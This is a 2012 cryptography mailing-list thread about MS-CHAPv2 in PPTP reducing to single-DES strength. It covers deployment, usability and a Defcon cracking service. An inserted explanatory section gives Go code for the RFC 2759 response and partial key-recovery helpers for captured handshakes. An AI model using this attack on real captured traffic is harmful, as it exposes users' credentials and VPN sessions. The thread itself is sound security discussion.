Discussion:
MS PPTP MPPE only as secure as *single* DES
Marsh Ray
2012-04-03 19:29:18 UTC
There is no Diffie-Hellman in the PPTP handshake. AFAICT, the MS-CHAPv2
hashes are sent in the clear.

Per
http://www.schneier.com/paper-pptpv2.html
http://www.schneier.com/paper-pptpv2.pdf pg 5
4 MS-CHAPv2: Deriving the 24-byte Response
Both MS-CHAPv1 and MS-CHAPv2 use the same procedure to derive a 24-byte
1. The 16-byte NT hash is padded to 21 bytes by appending five zero bytes.
2. Let X, Y, Z be the three consecutive 7-byte blocks of this 21-byte value,
and let C be the 8-byte challenge. The 24-byte response R is calculated
as R = DES_X(C), DES_Y(C), DES_Z(C).
The RFC seems to confirm this description.
DesEncrypt(
IN 8-octet Clear,
IN 7-octet Key,
OUT 8-octet Cypher )
...
ChallengeResponse(
IN 8-octet Challenge,
IN 16-octet PasswordHash,
OUT 24-octet Response )
{
Set ZPasswordHash to PasswordHash zero-padded to 21 octets
DesEncrypt( Challenge,
1st 7-octets of ZPasswordHash,
giving 1st 8-octets of Response )
DesEncrypt( Challenge,
2nd 7-octets of ZPasswordHash,
giving 2nd 8-octets of Response )
DesEncrypt( Challenge,
3rd 7-octets of ZPasswordHash,
giving 3rd 8-octets of Response )
}
Therefore, from any packet capture of a PPTP session which includes the
initial handshake, a brute force of the response
1DES(nthash[0..6], c)
|| 1DES(nthash[7..13], c)
|| 1DES(nthash[14..15] || '0' x 5, c)

yields the complete NT hash with complexity 2^57.

The NT hash is a password-equivalent, and it represents the only secret
material that goes into the MPPE encryption key derivation.

So MS PPTP + MS-CHAPv2 + MPPE can be no better than single DES, and a
break discloses your login credentials for use with other services.

Is anyone aware of this protocol having been fixed since the 1999 paper?

- Marsh
Marsh Ray
2012-04-05 08:55:32 UTC
Wow the crickets are deafening tonight. :-)
Post by Marsh Ray
yields the complete NT hash with complexity 2^57.
The NT hash is a password-equivalent, and it represents the only secret
material that goes into the MPPE encryption key derivation.
So I point out that one of the most commonly-used VPN protocols is
completely ineffective and this is the reaction I get? Gee I expected
more from you guys. :-) It must be college basketball season or something.

Perhaps I just phrased it wrong. Let me try again:

Hey yall!
There's this here NSA backdoor still lingering around from the 1990's!
I guess we know what they wanted that big ole datacenter now for huh?

And the 51st state (Canada) is launchin a challenger to Bitcoin
http://developer.mintchipchallenge.com/index.php

Coincidence? Ha!

:-)

- Marsh
Ralf-Philipp Weinmann
2012-04-05 09:12:43 UTC
Post by Marsh Ray
Wow the crickets are deafening tonight. :-)
Post by Marsh Ray
yields the complete NT hash with complexity 2^57.
The NT hash is a password-equivalent, and it represents the only secret
material that goes into the MPPE encryption key derivation.
So I point out that one of the most commonly-used VPN protocols is completely ineffective and this is the reaction I get? Gee I expected more from you guys. :-) It must be college basketball season or something.
Do you have statistics on that? I remember newer Microsoft and Apple operating systems supporting L2Sec quite well. And then there are the Cisco abominations of IPSec that are quite common. But maybe not as common as SSL VPNs. And let's not forget OpenVPN for the geek faction. Where did you get the data that PPTP still is "one of the most commonly-used VPN protocols"?

PPTP might be the path of least resistance in terms of setup, but I'm unsure about its current deployment rate.
Post by Marsh Ray
Hey yall!
There's this here NSA backdoor still lingering around from the 1990's!
I guess we know what they wanted that big ole datacenter now for huh?
Marsh, sorry, but that is ridiculous. A high-school kid with a couple of hard drives filled with rainbow tables will do as a valid stand-in for the attacker in your threat model. Heck, I'd guess there's even a Russian "cloud service" for this by now.

-Ralf
Marsh Ray
2012-04-05 17:06:14 UTC
Post by Ralf-Philipp Weinmann
Do you have statistics on that? I remember newer Microsoft and Apple
operating systems supporting L2Sec quite well. And then there are the
Cisco abominations of IPSec that are quite common. But maybe not as
common as SSL VPNs. And let's not forget OpenVPN for the geek
faction. Where did you get the data that PPTP still is "one of the
most commonly-used VPN protocols"?
Honestly, it's been years since I messed with VPNs and I have not done
methodical research. I suspect VPN industry studies are likely to be
skewed by selection bias (IT departments who are likely to spend
money on a real VPN).

Here's why I think PPTP is still in common use.

* PPTP is supported by Windows XP without any special client software.
So is L2TP/IPsec PSK, but that's not the kind of VPN that users log in
to. Most other solutions seem to involve the admin setting up a PKI
infrastructure. We all know how much fun that is.

* There's a plethora of HOWTO pages for VPNs that use PPTP. E.g.
http://www . chicagotech . net/vpnsetup.htm

* Some sources even treat PPTP as synonymous with VPNs:
http://www . sevenforums .
com/tutorials/4517-virtual-private-network-vpn-enable-incoming-vpn-connections.html
"How to Configure your Computer to Accept Incoming VPN Connections in
Windows 7 [...] Information This will show you how to configure your
computer to accept VPN connection and router settings to allow
Point-to-Point Tunneling Protocol (PPTP) on your Network in Windows 7."

* http://bandwidthcontroller . com/applicationPorts.html
"This table lists the ports used by some of the more popular applications."
PPTP is listed, L2TP/IPsec is not even mentioned.

* http://whatismyipaddress . com/vpn-service
"PPTP is the most common VPN protocol. It uses TCP port 1723 and Generic
Routing Encapsulation (GRE) to secure packets. The main advantage of
PPTP is that all major operating systems and many smartphones can
natively use PPTP without any additional software."

* http://www.wilderssecurity.com/showpost.php?p=1565325&postcount=19
"I'm reading and the only thing I've come across is that MS CHAP v1 is
badly broken and MS CHAP v2 is susceptible to dictionary attacks because
the keys are derived deterministically from the password."

* http://www.sans.org/security-resources/malwarefaq/pptp-vpn.php
Post by Ralf-Philipp Weinmann
Hey yall! There's this here NSA backdoor still lingering around
from the 1990's! I guess we know what they wanted that big ole
datacenter now for huh?
Marsh, sorry, but that is ridiculous.
Yes, it was a bit silly I admit :-)
Post by Ralf-Philipp Weinmann
A high-school kid with a couple
of hard drives filled with rainbow tables will do as a valid stand-in
for the attacker in your threat model. Heck, I'd guess there's even a
Russian "cloud service" for this by now.
I disagree.

There are users who are careful to choose really good passwords. There
are smart folks who are expecting this protocol to provide security
equivalent to the password, at least up to 128 bits. I have talked with
a few of them.

Here's a random example from the web:

http://www . net . princeton . edu/vpn/pptp.html
"If you connect using MS-CHAPv2 and are using a weak password, attackers
can use this tool to discover your password. As this tool relies on a
dictionary search, it should be possible to defend against it by
selecting an extremely strong OIT Windows password."

- Marsh
Peter Maxwell
2012-04-06 01:23:43 UTC
Post by Marsh Ray
Post by Ralf-Philipp Weinmann
Do you have statistics on that? I remember newer Microsoft and Apple
operating systems supporting L2Sec quite well. And then there are the
Cisco abominations of IPSec that are quite common. But maybe not as
common as SSL VPNs. And let's not forget OpenVPN for the geek
faction. Where did you get the data that PPTP still is "one of the
most commonly-used VPN protocols"?
Honestly, it's been years since I messed with VPNs and I have not done
methodical research. I suspect VPN industry studies are likely to be
skewed by selection bias (IT departments who are likely to spend
money on a real VPN).
There are two reasons I haven't commented on this (despite it being good
work):

i. I'm not familiar enough with PPTP, and always avoided it like the plague
anyway (and that was 10 years ago). Does dial-up not still generally use
MS-CHAPv2?

ii. There's only been once I've seen a company use PPTP for a VPN, and I
responded as any self-respecting sys-admin would... I laughed, took the
piss a bit, then fixed it. Anything else I've seen has been Cisco (IPSec
or SSL afaik), Checkpoint (IPSec?), more bog-standard IPSec setups and
OpenVPN. For that matter, I've seen companies use the sshd socks proxy as
a "VPN".
Ondrej Mikle
2012-04-06 13:46:08 UTC
Post by Ralf-Philipp Weinmann
Do you have statistics on that? I remember newer Microsoft and Apple
operating systems supporting L2Sec quite well. And then there are the
Cisco abominations of IPSec that are quite common. But maybe not as
common as SSL VPNs. And let's not forget OpenVPN for the geek
faction. Where did you get the data that PPTP still is "one of the
most commonly-used VPN protocols"?
Honestly, it's been years since I messed with VPNs and I have not
done methodical research. I suspect VPN industry studies are likely
to be skewed by selection bias (IT departments who are likely to
spend money on a real VPN).
There are two reasons I haven't commented on this (despite it being good
work):
i. I'm not familiar enough with PPTP, and always avoided it like the
plague anyway (and that was 10 years ago). Does dial-up not still
generally use MS-CHAPv2?
Not sure about dialup, but in 802.1x the combination of PEAP/MSCHAPv2 is
still quite common (last seen about a week ago). Though without MitM-ing
the outer layer (PEAP) it'd be difficult to use the MSCHAPv2 attack
because the challenge is not in the clear, I guess.

On the other hand, there's only a handful of people that supply the
server cert for 802.1x, so MitM-ing shouldn't be hard in practice.

Ondrej
James A. Donald
2012-04-05 21:51:10 UTC
Post by Marsh Ray
So I point out that one of the most commonly-used VPN protocols is
completely ineffective and this is the reaction I get? Gee I expected
more from you guys. :-)
Hey yall!
There's this here NSA backdoor still lingering around from the 1990's!
I guess we know what they wanted that big ole datacenter now for huh?
One of the most commonly-used VPN protocols is completely ineffective.
Also, the pope is Catholic, and bears shit in the wood.

When I set up a vpn, what usually happens is that the package offers me
two protocols, one that it deprecates as insecure (MS PPTP), and openvpn.

The setup info or the web page tells me that MS PPTP has the great
advantage that it is built in to Microsoft, and the great disadvantage
that it is not secure.

So I think that pretty much everyone has already heard that MS PPTP is
insecure. Every time I set up a vpn, I am re-reminded, just in case.
Brian Keefer
2012-04-05 22:30:15 UTC
Post by Marsh Ray
So I point out that one of the most commonly-used VPN protocols is
completely ineffective and this is the reaction I get? Gee I expected
more from you guys. :-)
Hey yall!
There's this here NSA backdoor still lingering around from the 1990's!
I guess we know what they wanted that big ole datacenter now for huh?
One of the most commonly-used VPN protocols is completely ineffective. Also, the pope is Catholic, and bears shit in the wood.
When I set up a vpn, what usually happens is that the package offers me two protocols, one that it deprecates as insecure (MS PPTP), and openvpn.
The setup info or the web page tells me that MS PPTP has the great advantage that it is built in to Microsoft, and the great disadvantage that it is not secure.
So I think that pretty much everyone has already heard that MS PPTP is insecure. Every time I set up a vpn, I am re-reminded, just in case.
Perhaps we're overlooking the fact that the vast majority of Small & Medium Business VPN implementations are done by hassled IT people, not security experts who care enough to sign up for encryption mailing lists.

Perhaps someone should Scan The Internet(TM) for PPTP (1723/TCP). I assure you it's still very much alive.

Edit: Just did a string search on Shodan (free account) and it returned 240 results for "pptp." Keep in mind that's just in http/ftp server headers/banners, snmp attributes, etc. SFAIK it doesn't index other ports.

PS People "know" passwords are insecure too, but 'password1' is everywhere.

--
bk
Steven Bellovin
2012-04-06 00:57:14 UTC
Post by Marsh Ray
So I point out that one of the most commonly-used VPN protocols is
completely ineffective and this is the reaction I get? Gee I expected
more from you guys. :-)
Hey yall!
There's this here NSA backdoor still lingering around from the 1990's!
I guess we know what they wanted that big ole datacenter now for huh?
One of the most commonly-used VPN protocols is completely ineffective. Also, the pope is Catholic, and bears shit in the wood.
When I set up a vpn, what usually happens is that the package offers me two protocols, one that it deprecates as insecure (MS PPTP), and openvpn.
The setup info or the web page tells me that MS PPTP has the great advantage that it is built in to Microsoft, and the great disadvantage that it is not secure.
So I think that pretty much everyone has already heard that MS PPTP is insecure. Every time I set up a vpn, I am re-reminded, just in case.
"Don't use cryptographic overkill. Even bad crypto is usually the strong part of the system." Adi Shamir, 1995. (http://www.ieee-security.org/Cipher/ConfReports/conf-rep-Crypto95.html)

--Steve Bellovin, https://www.cs.columbia.edu/~smb
ianG
2012-04-08 11:30:43 UTC
Post by Steven Bellovin
So I think that pretty much everyone has already heard that MS PPTP is insecure. Every time I set up a vpn, I am re-reminded, just in case.
"Don't use cryptographic overkill. Even bad crypto is usually the strong part of the system." Adi Shamir, 1995. (http://www.ieee-security.org/Cipher/ConfReports/conf-rep-Crypto95.html)
All hail the great A5/1 and lesser spawn.

Seriously though, we suffer tremendously in this industry from overkill.
Studying the biases in the field would make a great cross-over PhD in
psych-CS-crypto-business. Is there anyone amongst us who hasn't
chortled with glibbity and glee when some despised crypto system falls
to a pernickity academic attack?

In order to replace the myth that crypto must be perfect, maybe we need
a countervailing myth? Something like (whiteboarding here):

A finely balanced choice is as much an opportunity
to measure ones attacker [0], as a way to preserve and
reward a future generation of architects.

Call it the easter egg theory of crypto-plumbing? Gotta lay down some
chocolate to keep new bunnies hopping...



iang



[0] Dan Geer's delta argument.
Steven Bellovin
2012-04-08 23:15:43 UTC
Post by ianG
Post by Steven Bellovin
So I think that pretty much everyone has already heard that MS PPTP is insecure. Every time I set up a vpn, I am re-reminded, just in case.
"Don't use cryptographic overkill. Even bad crypto is usually the strong part of the system." Adi Shamir, 1995. (http://www.ieee-security.org/Cipher/ConfReports/conf-rep-Crypto95.html)
All hail the great A5/1 and lesser spawn.
Seriously though, we suffer tremendously in this industry from overkill. Studying the biases in the field would make a great cross-over PhD in psych-CS-crypto-business. Is there anyone amongst us who hasn't chortled with glibbity and glee when some despised crypto system falls to a pernickity academic attack?
Sure -- and I (and many others on this list) have worked hard for good, secure crypto standards. But things like PPTP, even when flawed, have survived for a reason. Often, the reason is that they're far more *usable* than the stronger alternatives. Let's take openvpn, which some others have spoken favorably of in this thread. Consider http://openvpn.net/index.php/open-source/documentation/howto.html (and especially http://openvpn.net/index.php/open-source/documentation/howto.html#examples), the "official" starting points. Then contrast that with what a typical sysadmin has to know to set up PPTP. Yes, I understand why openvpn has a harder job, though I do think that a fair amount of the complexity could be hidden by (a) a bit more management software, and (b) the developers making certain decisions (and hence taking them away from the sysadmin). Both of those take a great deal of taste to do correctly, of course.

IPsec is often worse. Take a look at, say, http://www.freebsd.org/doc/en_US.ISO8859-1/articles/checkpoint/racoon.html, or the man page at http://www.linuxmanpages.com/man5/racoon.conf.5.php . There's a fearsome amount you have to wade through just to decide that you don't need to touch, say, the "nonce_size" option. More substantively, how many hours will it take the typical sysadmin to understand the description of the "generate_policy" option?

So -- you're the typical sysadmin. You can spend many hours trying to understand all that stuff, or you can click through a very few screens and get crypto that will certainly deter the casual adversary at the local hotspot, will block even the NSA's vacuum cleaners -- and if you're targeted, might not be the weak point after all, since exploiting bad crypto depends at a minimum on actually picking up the traffic of interest, while a host exploit is always there.

Yes, the algorithms and protocols can be very important, especially if you have serious enemies. They're also more fun for many folks (myself included) than the really hard engineering and development work to make the thing usable. They're orders of magnitude more fun than the arguments in standards bodies to agree on what is really necessary as an option, as opposed to something that most people don't want but some vendor insists has to be there for 2.71828% of their customer base.



--Steve Bellovin, https://www.cs.columbia.edu/~smb
James A. Donald
2012-04-08 23:49:04 UTC
Post by Steven Bellovin
Yes, the algorithms and protocols can be very important,
especially if you have serious enemies. They're also more
fun for many folks (myself included) than the really hard
engineering and development work to make the thing usable.
They're orders of magnitude more fun than the arguments in
standards bodies to agree on what is really necessary as an
option, as opposed to something that most people don't want
but some vendor insists has to be there for 2.71828% of
their customer base.
Seems to me that most crypto failure is usability failure.
The only massive protocol and algorithm failure is wifi.

Also, anything that comes out of a committee, particularly a
large committee containing conflicting agendas, evil people,
stupid people, and crazy people, is apt to be a massive
usability fail, and the only reason why it is usually not
also a massive algorithm and protocol fail is that the
stupid, the crazy, and the evil have difficulty following the
protocol and algorithm discussion.
Steven Bellovin
2012-04-09 00:17:58 UTC
Post by James A. Donald
Post by Steven Bellovin
Yes, the algorithms and protocols can be very important,
especially if you have serious enemies. They're also more
fun for many folks (myself included) than the really hard
engineering and development work to make the thing usable.
They're orders of magnitude more fun than the arguments in
standards bodies to agree on what is really necessary as an
option, as opposed to something that most people don't want
but some vendor insists has to be there for 2.71828% of
their customer base.
Seems to me that most crypto failure is usability failure.
The only massive protocol and algorithm failure is wifi.
Yup. Even there, the problem that got most of the attention
-- the fact that RC4 (as used in WEP) can be cryptanalyzed --
wasn't knowable at the time. The avoidable errors -- the
misuse of a stream cipher, and the lack of a standardized
key management layer -- were not enough to prompt a change
in the standard.
Post by James A. Donald
Also, anything that comes out of a committee, particularly a
large committee containing conflicting agendas, evil people,
stupid people, and crazy people, is apt to be a massive
usability fail, and the only reason why it is usually not
also a massive algorithm and protocol fail is that the
stupid, the crazy, and the evil have difficulty following the
protocol and algorithm discussion.
I'd put most of it down to conflicting agendas -- even people
you regard as "evil" don't see themselves that way; they
simply have a different definition -- agenda -- for "good".
Craziness doesn't generally survive, nor stupidity. Granted,
some folks with different agendas may (or may not) understand
certain details, but if they don't it's because that isn't
important to their employers' agendas.

One more thing: algorithm and protocol failures are often a
matter of fact, not opinion, and most people are reluctant
to argue for something that everyone else can see is factually
incorrect. I recall one incident when I was Security Area Director
in the IETF when I blocked some SIP documents because of a
cut-and-paste attack. I had a very hostile meeting with a fair
number of the proponents of those documents -- until I pulled
out my laptop and showed exactly how the attack worked. End
of discussion, period. One can disagree on the likelihood or
impact of a vulnerability, but generally not its existence,
until the audience is politicians. (The disagreements, circa
the late 1970s, on the susceptibility of DES to an economically
feasible brute force attack come to mind.) The trouble comes
when it gets to matters of taste and judgment, and what adding
17.3 new features to the protocol will do to the software's
correctness and comprehensibility.


--Steve Bellovin, https://www.cs.columbia.edu/~smb
James A. Donald
2012-04-09 03:33:09 UTC
Post by Steven Bellovin
I'd put most of it down to conflicting agendas -- even people
you regard as "evil" don't see themselves that way; they
simply have a different definition -- agenda -- for "good".
An agenda which requires them to lie about what they believe, stack
committees, falsify the evidence, and personally destroy, Alinsky style,
those who mention inconvenient truths.
Post by Steven Bellovin
One can disagree on the likelihood or
impact of a vulnerability, but generally not its existence,
until the audience is politicians.
The probability that the audience is politicians tends to increase with
the size of the meeting.
ianG
2012-04-11 01:37:39 UTC
Post by James A. Donald
Post by Steven Bellovin
I'd put most of it down to conflicting agendas -- even people
you regard as "evil" don't see themselves that way; they
simply have a different definition -- agenda -- for "good".
An agenda which requires them to lie about what they believe, stack
committees, falsify the evidence, and personally destroy, Alinsky style,
those who mention inconvenient truths.
I think there is a widespread misconception about committees. People
think they are there to create good results. I think that is wrong. I
think they are there to stop outright wars in foisting bad results on an
unwitting public.

As a step up from outright commercial war, if they can be kept polite
and safe then that's as much as we can expect. The fact that companies
are likely to send their best (cough) "politicians" into the committee
to get their deals is a given.

It's what they get paid for. You asking for something different is
perhaps your error.
Post by James A. Donald
Post by Steven Bellovin
One can disagree on the likelihood or
impact of a vulnerability, but generally not its existence,
until the audience is politicians.
The probability that the audience is politicians tends to increase with
the size of the meeting.
Even a committee of 2 requires delicate political skills... :) Beyond
2, calling it "political" is perhaps being overly polite with the truth.



iang
Marsh Ray
2012-07-31 00:41:49 UTC
Post by Marsh Ray
Therefore, from any packet capture of a PPTP session which includes the
initial handshake, a brute force of the response yields the complete NT
hash with complexity 2^57.
The NT hash is a password-equivalent, and it represents the only secret
material that goes into the MPPE encryption key derivation.
So MS PPTP + MS-CHAPv2 + MPPE can be no better than single DES, and a
break discloses your login credentials for use with other services.
An update:

Moxie Marlinspike and David Hulton have improved the attack from 2^57 to
2^56.

Two days ago at Defcon 20 they released open source software for parsing
network captures for any MS-CHAPv2 handshakes and an online service
using a Pico Computing FPGA cluster to reverse the NT hash. This allows
decrypting a captured PPTP session or logging in as the user in about
half a day on average.

https://www.defcon.org/html/defcon-20/dc-20-speakers.html#Marlinspike
https://www.cloudcracker.com/blog/2012/07/29/cracking-ms-chap-v2/

On Monday, Jacob Applebaum and I will be presenting our "vpwns: Virtual
Pwned Networks" paper at Usenix FOCI '12. It discusses the limitations
of off-the-shelf VPN systems when used for user anonymity and censorship
resistance. PPTP is a common choice for these systems, so we'll take the
opportunity to reiterate the inherent weakness in MS-CHAPv2.

https://www.usenix.org/conference/foci12/vpwns-virtual-pwned-networks

This is a good opportunity for everyone to make a contribution to
practical crypto. Anyone that can pitch in, let's do a full-court press
on lobbying for the wholesale replacement for MS-CHAPv2 and to raise
awareness of the decryptability of PPTP. We could use blog posts, press
articles, tweets, etc.

Let's make this the week that the whole industry realizes that vendors
shipping these protocols are continuing to sell crummy sub-standard
single-DES crypto products which don't conform to modern security
requirements.

- Marsh
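The RFC 2759 derivation quoted in the first post, and the block-independence behind the 2^57 and 2^56 figures, as an added Go example (not code from the thread, the RFC, or the chapcrack release; the function names are mine). It uses crypto/des from the Go standard library, implements DesEncrypt, ChallengeHash and ChallengeResponse as the RFC describes them, then runs the part of the attack that is cheap enough to execute inline: the third DES key is nthash[14..15] followed by five zero bytes, so those two bytes fall out of at most 2^16 trial encryptions. The first two blocks are both DES_k(C) under the same plaintext C, which is why one 2^56 pass over the key space checks both; the example performs that check over a hand-supplied candidate list rather than walking the key space. The known-answer vectors in main are copied from RFC 2759 section 9 (UserName "User", Password "clientPass"); the NT hash itself (MD4 of the UTF-16LE password) is taken from the RFC rather than computed.

```go
package main

import (
	"bytes"
	"crypto/des"
	"crypto/sha1"
	"encoding/hex"
	"fmt"
)

// expandKey spreads 7 key octets over 8 (seven key bits, then a parity bit)
// as crypto/des expects; DES ignores the parity bits, so they are left 0.
func expandKey(k7 []byte) []byte {
	k8 := make([]byte, 8)
	k8[0] = k7[0] & 0xFE
	for i := 1; i < 7; i++ {
		k8[i] = ((k7[i-1] << (8 - uint(i))) | (k7[i] >> uint(i))) & 0xFE
	}
	k8[7] = k7[6] << 1
	return k8
}

// desEncrypt is RFC 2759 DesEncrypt(Clear, Key) -> Cypher: one DES block.
func desEncrypt(key7, clear []byte) []byte {
	block, _ := des.NewCipher(expandKey(key7)) // key is always 8 bytes; cannot fail
	out := make([]byte, 8)
	block.Encrypt(out, clear)
	return out
}

// challengeHash is RFC 2759 ChallengeHash: C = SHA1(Peer || Auth || User)[:8].
// All three inputs cross the wire in the clear, so a sniffer recomputes C.
func challengeHash(peer, auth []byte, user string) []byte {
	h := sha1.New()
	h.Write(peer)
	h.Write(auth)
	h.Write([]byte(user))
	return h.Sum(nil)[:8]
}

// challengeResponse is RFC 2759 ChallengeResponse: the NT hash is zero-padded
// to 21 bytes and each 7-byte slice keys an independent DES of C.
func challengeResponse(challenge, ntHash []byte) []byte {
	z := make([]byte, 21)
	copy(z, ntHash)
	resp := make([]byte, 0, 24)
	for i := 0; i < 3; i++ {
		resp = append(resp, desEncrypt(z[7*i:7*i+7], challenge)...)
	}
	return resp
}

// recoverTail attacks block 3 by itself: its key is ntHash[14..15] plus five
// zero bytes, so at most 2^16 DES operations recover those two bytes.
func recoverTail(challenge, response []byte) (b14, b15 byte, ok bool) {
	key := make([]byte, 7)
	for c := 0; c < 1<<16; c++ {
		key[0], key[1] = byte(c>>8), byte(c)
		if bytes.Equal(desEncrypt(key, challenge), response[16:24]) {
			return key[0], key[1], true
		}
	}
	return 0, 0, false
}

// matchBothBlocks is the 2^56 observation: blocks 1 and 2 are DES_k(C) for
// the same C, so one DES per candidate key is checked against both outputs.
// The 2^56 walk itself is not attempted; the caller supplies the candidates.
func matchBothBlocks(challenge, response []byte, cands [][]byte) (k1, k2 []byte) {
	for _, k := range cands {
		enc := desEncrypt(k, challenge)
		if bytes.Equal(enc, response[0:8]) {
			k1 = k
		}
		if bytes.Equal(enc, response[8:16]) {
			k2 = k
		}
	}
	return k1, k2
}

func main() {
	// Known-answer vectors from RFC 2759 section 9 (UserName "User", Password
	// "clientPass"); the NT hash there is MD4 of the UTF-16LE password.
	auth, _ := hex.DecodeString("5B5D7C7D7B3F2F3E3C2C602132262628")
	peer, _ := hex.DecodeString("21402324255E262A28295F2B3A337C7E")
	ntHash, _ := hex.DecodeString("44EBBA8D5312B8D611474411F56989AE")
	c := challengeHash(peer, auth, "User")
	r := challengeResponse(c, ntHash)
	fmt.Printf("C %X  (RFC: D02E4386BCE91226)\n", c)
	fmt.Printf("R %X\n  (RFC: 82309ECD8D708B5EA08FAA4981CD83544233114A3D85D6DF)\n", r)
	b14, b15, ok := recoverTail(c, r)
	fmt.Printf("ntHash[14..15] from block 3: %02X%02X ok=%v\n", b14, b15, ok)
	k1, k2 := matchBothBlocks(c, r, [][]byte{{1, 2, 3, 4, 5, 6, 7}, ntHash[0:7], ntHash[7:14]})
	fmt.Printf("block 1 key %X, block 2 key %X\n", k1, k2)
}
```

With a real capture, the peer challenge, authenticator challenge, user name and 24-byte NT-Response are all read off the wire, which is what the capture-parsing step of the released tool does; the FPGA cluster then does the single 2^56 DES pass that matchBothBlocks only sketches. Recovering all 16 bytes of the NT hash is enough both to log in as the user and to derive the MPPE keys, since, as noted above, the hash is the only secret that feeds the key derivation.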
Harald Hanche-Olsen
2012-08-01 11:23:26 UTC
This story is on Ars Technica today, where it might get a bit more exposure:

http://arstechnica.com/security/2012/07/broken-microsoft-sheme-exposes-traffic/

- Harald
